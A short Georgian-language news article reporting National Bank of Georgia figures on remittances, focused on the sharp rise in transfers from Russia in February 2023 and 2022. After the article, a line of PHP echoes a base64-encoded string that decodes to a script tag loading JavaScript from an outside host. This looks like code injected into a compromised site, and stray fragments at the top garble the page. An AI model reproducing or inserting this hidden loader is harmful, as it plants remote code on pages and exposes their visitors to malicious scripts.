celsiusi
ავერსი საქკაბელი

თებერვალში საქართველოში ფულადი გზავნილები შენელდა. საქართველოს ეროვნული ბანკის სტატისტიკის მიხედვით, წინა თვეს ქვეყანაში 372.3 მლნ დოლარო გადმოირიცხა. ამ თანხის დიდი ნაწილი კი - 50% რუსეთის ფედერაციიდან გადმოირიცხა.

ამასთან, სებ-ის მონაცემებით, 2023 წლის თებერვალში რუსეთიდან საქართველომ 187.3 მლნ დოლარის ფულადი გზავნილი მიიღო. წინა წლის ანალოგიურ პერიოდთან შედარებით, გზავნილები 754%-ითაა გაზრდილი. გასულ წელის თებერვალში რუსეთიდან საქართველოში 21.9 მლნ დოლარი გადმოირიცხა, რითიც წინა წლის მაჩვენებელი 12.7%-ით იყო შემცირებული. აღსანიშნავია, რომ თებერვლის გზავნილების სტატისტიკაში რუსეთი ისევ პირველ პოზიციაზეა.

აღსანიშნავია, რომ 2022 წელს საქართველოში რეკორდული რაოდენობის ფულადი გზავნილები გადმოირიცხა. ეროვნული ბანკის მონაცემებით, გასულ წელს ქვეყანამ ფულადი გზავნილების სახით 4.4 მილიარდი დოლარი მიიღო, რაც ისტორიული მაქსიმუმი იყო და 2021 წელთან შედარებით თითქმის გაორმაგებულ მაჩვენებელს წარმოადგენდა.

2022 წელს ქვეყნებს შორის ლიდერი რუსეთის ფედერაცია იყო, საიდანაც გადმორიცხვები წლიურ ჭრილში 5-ჯერ გაიზარდა. გასულ წელს რუსეთიდან 2 მილიარდ დოლარზე მეტი გადმოირიცხა, რაც მთლიანი გზავნილების 47.29%-ს შეადგენდა.

643
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");